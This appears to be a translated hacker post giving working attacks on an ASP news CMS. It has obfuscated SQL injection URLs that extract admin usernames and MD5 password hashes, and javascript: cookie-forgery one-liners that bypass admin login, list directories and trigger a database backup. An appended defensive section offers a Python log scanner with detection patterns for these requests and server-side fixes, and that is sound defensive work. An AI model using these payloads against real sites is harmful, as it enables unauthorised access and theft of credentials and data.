I. Injection
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
2. Step 1: javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
Step 2: request: admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
This yields the username and the MD5-hashed password.
II. Cookie spoofing
1. Going straight into the admin backend. Applies to older versions; generally, versions where login.asp and admin_index.asp sit in the same directory have this vulnerability.
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
2. Directory listing.
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
3. Database backup (seems to work on fewer versions.)
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
4. Method for entering the backend when the MD5 password obtained cannot be cracked
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
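As an added defensive example (not part of the original post), the Python scanner below percent-decodes query strings and cookie values before matching, so the letter-encoding used above (%53elect, %41nd, %46rom) and the forged admindj / 'or'='or' cookie values are still caught. The W3C-style field order and the sample log lines are constructed for this example and are not the CMS's own log format.

```python
# Added example: detect the obfuscated injection and cookie-forgery requests
# listed above in web-server logs. Field order is an assumption:
# date time method uri-stem uri-query cookie status (W3C style, constructed).
import re
from urllib.parse import unquote_plus

# Matched against the decoded, lower-cased query string, so splitting
# keywords with percent-encoded letters (%53elect, %41nd) no longer hides them.
SQLI_PATTERNS = [
    re.compile(r"\bunion\s+(all\s+)?select\b"),
    re.compile(r"\bfrom\s+admin\b"),
    re.compile(r"\b(and|or)\s+1\s*=\s*2\b"),
]
# Client-set cookie values the vulnerable versions trust for admin access.
COOKIE_BYPASS = re.compile(r"admindj=1|'or'='or'")


def normalize(value: str) -> str:
    """Percent-decode until stable (covers double encoding), then lower-case."""
    prev = None
    while prev != value:
        prev, value = value, unquote_plus(value)
    return re.sub(r"\s+", " ", value).lower()


def inspect(line: str) -> list[str]:
    """Return the alerts raised for one log line (empty list when clean)."""
    fields = line.split(" ", 6)
    if len(fields) < 7:
        return []
    _, _, _, stem, query, cookie, _ = fields
    alerts = []
    if any(p.search(normalize(query)) for p in SQLI_PATTERNS):
        alerts.append(f"sqli {stem}")
    if COOKIE_BYPASS.search(normalize(cookie)):
        alerts.append(f"cookie-forgery {stem}")
    return alerts


def scan(log_text: str) -> list[tuple[int, list[str]]]:
    """Return (line number, alerts) for every log line that raised an alert."""
    hits = [(n, inspect(l)) for n, l in enumerate(log_text.splitlines(), 1)]
    return [(n, a) for n, a in hits if a]


# Constructed sample log: one encoded injection, one forged admin cookie, one clean hit.
LOG = """\
2009-01-01 10:00:00 GET /news_more.asp lm=2+%41nd+1=2+union+%53elect+1,2,3,0x3b%26user,0x3b%26pass,6,7,8+%46rom+%41dmin - 200
2009-01-01 10:00:05 GET /admin_index.asp - adminuser=%27or%27%3D%27or%27;adminpass=%27or%27%3D%27or%27;admindj=1 200
2009-01-01 10:00:09 GET /news_more.asp lm=2 - 200
"""

if __name__ == "__main__":
    for number, alerts in scan(LOG):
        print(number, ", ".join(alerts))
```

The durable fix on the server side is to stop trusting client-supplied admin cookies and to validate login state in a server-side session, with parameterized queries replacing string-built SQL.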